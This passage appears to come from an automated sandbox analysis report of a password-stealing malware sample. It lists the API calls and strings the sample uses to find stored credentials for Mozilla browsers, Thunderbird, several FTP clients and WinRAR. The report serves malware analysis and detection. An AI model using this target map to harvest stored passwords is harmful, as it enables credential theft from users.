                                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Thunderbird,\Thunderbird,?,Software\Mozilla,Thunderbird,\Thunderbird,00400686,?,C0000000,00000003,00000000,00000002), ref: 0040F892
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,80000002,Software\Mozilla,Thunderbird,\Thunderbird,?,Software\Mozilla,Thunderbird,\Thunderbird,00400686,?,C0000000,00000003), ref: 0040F8AD
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Thunderbird,\Thunderbird,?,Software\Mozilla,Thunderbird,\Thunderbird,00000104,?,?,?,80000002,Software\Mozilla), ref: 0040F8F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory$CloseEnumOpen
                                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                  • API String ID: 3062143572-138716004
                                  • Opcode ID: 4f36bffca1f4c7bf40c94c30e669cdf7bbe3fb7f78240e8217ca339cc4304f0b
                                  • Instruction ID: e544878e9d7c703c1f3a1241cadc404ecf049be86d00c7737492d478eab7d5d8
                                  • Opcode Fuzzy Hash: 4f36bffca1f4c7bf40c94c30e669cdf7bbe3fb7f78240e8217ca339cc4304f0b
                                  • Instruction Fuzzy Hash: 88F0EC31B88208BADF21BB61CC43FCC7AB59B10748F508467B648701E3CBFD8AD59A48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E6D
                                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000), ref: 00401E77
                                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E8B
                                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                  • String ID: PathToExe
                                  • API String ID: 3012581338-1982016430
                                  • Opcode ID: 6719978e116f4f74b6fe1840e15c03544e04696c311f75a237314de5bc71cb0d
                                  • Instruction ID: 26fdae1b99b3a41fd3c75be40dc832e850ec111ed163878dae6f9528ba595cbd
                                  • Opcode Fuzzy Hash: 6719978e116f4f74b6fe1840e15c03544e04696c311f75a237314de5bc71cb0d
                                  • Instruction Fuzzy Hash: BE310F7195410ABAEF017FA1CD42EEE7F75EF04304F104436BA10750F2DA799A60AB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?), ref: 0040282D
                                  • 756D19A0.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,00000104,?,Software\WinRAR,?,?), ref: 004028AF
                                  • GlobalFix.KERNEL32(?), ref: 004028BB
                                  • GlobalUnWire.KERNEL32(?), ref: 004028DD
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E6D
                                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000), ref: 00401E77
                                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E8B
                                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Globallstrcatlstrcpy$PathTempWire
                                  • String ID: Software\WinRAR
                                  • API String ID: 3226276397-224198155
                                  • Opcode ID: 0c939b30875c8e7bb39647c922304de522569cb51f8bc35ae47d7163019f8044
                                  • Instruction ID: b236df76ed398757315f06d6d85d08d7d8e67b150c60cd6550e710cec1d30196
                                  • Opcode Fuzzy Hash: 0c939b30875c8e7bb39647c922304de522569cb51f8bc35ae47d7163019f8044
                                  • Instruction Fuzzy Hash: 01211D76900109BBDF55BBA1CD46EDEBB69AF04348F108576B600B10E1D6B98B94AB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040485C
                                  • StrStrIA.SHLWAPI(?,Line), ref: 0040488D
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpenValue
                                  • String ID: Line
                                  • API String ID: 4012628704-1898322888
                                  • Opcode ID: 92451237007aa8a73e7a71eb2e5866b16ff844aeb34cffd91f7885b00a0f4356
                                  • Instruction ID: c1fe354c5df2d147472c63de0b99e33003b149c2ae87472fa03303622d3e56eb
                                  • Opcode Fuzzy Hash: 92451237007aa8a73e7a71eb2e5866b16ff844aeb34cffd91f7885b00a0f4356
                                  • Instruction Fuzzy Hash: 652139B590011CBACF21ABA1CC41AED7BB9BF40304F00C4B6B644B50A0DB799B969F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
                                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E3CC
                                  • StrStrIA.SHLWAPI(?,.wjf,00000000,000007FF,?,?), ref: 0040E413
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpenValue
                                  • String ID: .wjf
                                  • API String ID: 4012628704-198459012
                                  • Opcode ID: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                  • Instruction ID: 445ef7b8b1bb7aa2afab0b85c8d47674782cb6e9d867fe5de917610d2ab08f6a
                                  • Opcode Fuzzy Hash: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                  • Instruction Fuzzy Hash: EE110A3191011CBADF11AF51CC41AEEBBB9FF04304F0484B6B554B11A1DBB99BA1AF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?), ref: 0040282D
                                    • Part of subcall function 004027F7: 756D19A0.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,00000104,?,Software\WinRAR,?,?), ref: 004028AF
                                    • Part of subcall function 004027F7: GlobalFix.KERNEL32(?), ref: 004028BB
                                    • Part of subcall function 004027F7: GlobalUnWire.KERNEL32(?), ref: 004028DD
                                  • 756C6F40.OLE32(?,00000000), ref: 0040458F
                                  • wsprintfA.USER32 ref: 004045D6
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$PathTempWirelstrlenwsprintf
                                  • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                  • API String ID: 1250355450-1100116640
                                  • Opcode ID: 124da5b47bff83786b08f67e36842c369c7c4699c6a3774405fbde1e7c85df35
                                  • Instruction ID: f53fd9df19a37a7436308050770a6827e165c979ed20dd1958a16c82b6db0aed
                                  • Opcode Fuzzy Hash: 124da5b47bff83786b08f67e36842c369c7c4699c6a3774405fbde1e7c85df35
                                  • Instruction Fuzzy Hash: 201139A68041987DDB61E3E68C05EFFBAFC590D305B1404ABB6A0E20C2D57DD780AB39
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72
                                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
                                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Firefox,\Mozilla\Firefox\,?,Software\Mozilla,Firefox,\Mozilla\Firefox\,00000104,?), ref: 00409DB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory$CloseEnumOpen
                                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                  • API String ID: 3062143572-2631691096
                                  • Opcode ID: 7eda6b5721f254ce154f1d2a6c7ccd6331c681789fa302d3ffa43946211adb74
                                  • Instruction ID: e7b17ff52d166462a165f3b6913ad71960ce3cd8d7ded6adb1efb220650c7e13
                                  • Opcode Fuzzy Hash: 7eda6b5721f254ce154f1d2a6c7ccd6331c681789fa302d3ffa43946211adb74
                                  • Instruction Fuzzy Hash: 4EF06270640208BADF20EB51CC47FCD7A659B04704F10807A7644740E3DFB9CAD09A48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF
                                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
                                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,SeaMonkey,\Mozilla\SeaMonkey\,?,Software\Mozilla,SeaMonkey,\Mozilla\SeaMonkey\,00000104,?), ref: 00409EF4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory$CloseEnumOpen
                                  • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                  • API String ID: 3062143572-164276155
                                  • Opcode ID: f9e7f29577e299ad71726a8f3152ee150a7e6bf65ea45033c1fb6cdfbfd99eae
                                  • Instruction ID: 6c0ca7a26b87c7c70e6a01aab92075298d7fe0072118fde892d006f484df090e
                                  • Opcode Fuzzy Hash: f9e7f29577e299ad71726a8f3152ee150a7e6bf65ea45033c1fb6cdfbfd99eae
                                  • Instruction Fuzzy Hash: CBF01270680208BADF10AB51CD43FCD7B669B14748F1180667704751E3D7B9DAD19A48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36
                                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
                                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Flock,\Flock\Browser\,?,Software\Mozilla,Flock,\Flock\Browser\,00000104,?), ref: 00409F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory$CloseEnumOpen
                                  • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                  • API String ID: 3062143572-1276807325
                                  • Opcode ID: 9e21b7f952f47b3bce71a082b2a367c29b824fd4732f6220330c934d11226cd5
                                  • Instruction ID: f5280ec9e0107380a21299960ef084744ae8c2892abc79ad58e4b51ce706d511
                                  • Opcode Fuzzy Hash: 9e21b7f952f47b3bce71a082b2a367c29b824fd4732f6220330c934d11226cd5
                                  • Instruction Fuzzy Hash: FCF01730680208BADF51AB61CC43FCD7AB5AB14749F218076BA48751E3DBB9DAD19A48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD
                                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000800,?,?), ref: 00409CEB
                                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00414845,?,?), ref: 00409D33
                                  • SetCurrentDirectoryA.KERNEL32(?,?,80000002,Software\Mozilla,Mozilla,\Mozilla\Profiles\,?,Software\Mozilla,Mozilla,\Mozilla\Profiles\,00000104,?), ref: 0040A002
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory$CloseEnumOpen
                                  • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                  • API String ID: 3062143572-2716603926
                                  • Opcode ID: e3a8f6c9dc996491b9ebc21dda82dd1b2b4be4b96e4f7d2f3d52a79bb2d85b98
                                  • Instruction ID: ad10bed4d9095064944b6f1b39750bb114de016addf6147f224309e21cc9b741
                                  • Opcode Fuzzy Hash: e3a8f6c9dc996491b9ebc21dda82dd1b2b4be4b96e4f7d2f3d52a79bb2d85b98
                                  • Instruction Fuzzy Hash: C2F03630680208BADF50BF51CC43FCD7A659B14745F1140667A08751E3DBF9DAD19B4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(006538A0,3D-FTP), ref: 0040CA80
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FreeLocal
                                  • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                  • API String ID: 1884169789-4074339522
                                  • Opcode ID: f29dda528c9785ac7156d715e2b54e500ccf282f14496746ed725026e67ab8da
                                  • Instruction ID: 3a8ef14eedaa50b1c948b24bf2c7183635c18f20d59f5e60411f4875eb663bb9
                                  • Opcode Fuzzy Hash: f29dda528c9785ac7156d715e2b54e500ccf282f14496746ed725026e67ab8da
                                  • Instruction Fuzzy Hash: D6119E70740105BAEF11B772CC42FAF2D599B81758F24023B7810B11E3DABCCA91A6AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$lstrcatlstrcpy
                                  • String ID: GHA
                                  • API String ID: 2414487701-3018847836
                                  • Opcode ID: f71ff39931f64361d812dad4e3d2ab52a9ebde6fa6cd4b61437f14084f70d867
                                  • Instruction ID: 85b7a3d42229304cf13bff08406ee8d7f14fa5e6f164b37a1fc03a90bdb793dc
                                  • Opcode Fuzzy Hash: f71ff39931f64361d812dad4e3d2ab52a9ebde6fa6cd4b61437f14084f70d867
                                  • Instruction Fuzzy Hash: 38F01C75100208BFDF017F62CC81A9D3B9AAB5035CF00D52AB91519152E7BD89E48B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AF21
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
                                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wsprintf$CloseEnumOpen
                                  • String ID: SiteServers
                                  • API String ID: 1693054222-2402683488
                                  • Opcode ID: a1f11ff4e54de8a2f1f41c19bf27dd541094ac564e6bd5b78484b3e2af1c4403
                                  • Instruction ID: a446ecacf4174ee40ccddb23f5ff2609404a5ff37a742fe041fe98d7ce509aa6
                                  • Opcode Fuzzy Hash: a1f11ff4e54de8a2f1f41c19bf27dd541094ac564e6bd5b78484b3e2af1c4403
                                  • Instruction Fuzzy Hash: C131287190021DEADF21AB51CD42BDEBAB9FF04304F04C0B6B154750A1DB795BA2AF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D65
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: MRU
                                  • API String ID: 1332880857-344939820
                                  • Opcode ID: eed336e1a62e36d599677b71e4fa2249832b60eb19a1861c88a116fd1c8e9e9c
                                  • Instruction ID: 0962f506e68cdd8ccaa0ff695c2f519e513318d4d31b2a5f0dea04bfe0af0b42
                                  • Opcode Fuzzy Hash: eed336e1a62e36d599677b71e4fa2249832b60eb19a1861c88a116fd1c8e9e9c
                                  • Instruction Fuzzy Hash: 8821F331900108BADF11AB51CD42FDE7BBABF00304F1085BAB554B50E1DBB95B91AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,?,?), ref: 00401CD2
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,80000001,80000001,00000000,00000000,?,?), ref: 00401CED
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000000,80000001,80000001,00000000,00000000), ref: 00401D23
                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,00000000,80000001,80000001,00000000,00000000,?,?), ref: 00401D45
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValue$CloseOpen
                                  • String ID:
                                  • API String ID: 1586453840-0
                                  • Opcode ID: 56cdd0336bac98b00ff7424e586f2218e00cec739b08c9fb7428d64b0c3150db
                                  • Instruction ID: f684edda37e69a729a9dfe3678b60f116084d598a8b6b39bf51dbd963b68634d
                                  • Opcode Fuzzy Hash: 56cdd0336bac98b00ff7424e586f2218e00cec739b08c9fb7428d64b0c3150db
                                  • Instruction Fuzzy Hash: 36213C31A00109BBEF229E60CD81BAE3BBAEF41344F144076F910A61E0D678EA95DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "password" : "
                                  • API String ID: 0-2310853927
                                  • Opcode ID: 1e0844ae07e4baac1052ecafffc0d8d1f9d74d402e6b44b33a99ba2adbb7f063
                                  • Instruction ID: bee61a90249f81009c8457dd16d7b53d7f9fc3dd6c708c4ffa186b800f2db450
                                  • Opcode Fuzzy Hash: 1e0844ae07e4baac1052ecafffc0d8d1f9d74d402e6b44b33a99ba2adbb7f063
                                  • Instruction Fuzzy Hash: 2C21CF71C08109FECF11BBA18C029EE7E66AF41358F204137F400B51A1E3794B91A7AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • wsprintfA.USER32 ref: 0040D315
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocalwsprintf
                                  • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                  • API String ID: 988369812-376751567
                                  • Opcode ID: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
                                  • Instruction ID: 199b26d5468ed6bde52246b1b6ef23e8a9f49e1214d4f7d1b5726db887637ddc
                                  • Opcode Fuzzy Hash: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
                                  • Instruction Fuzzy Hash: 62015E71D40109FAEF00BAD0CC82EEE7B79AB00718F508476F910B11D1D7BD9B98DA6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                                  • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExitFileHandleProcessRead
                                  • String ID:
                                  • API String ID: 1390701169-0
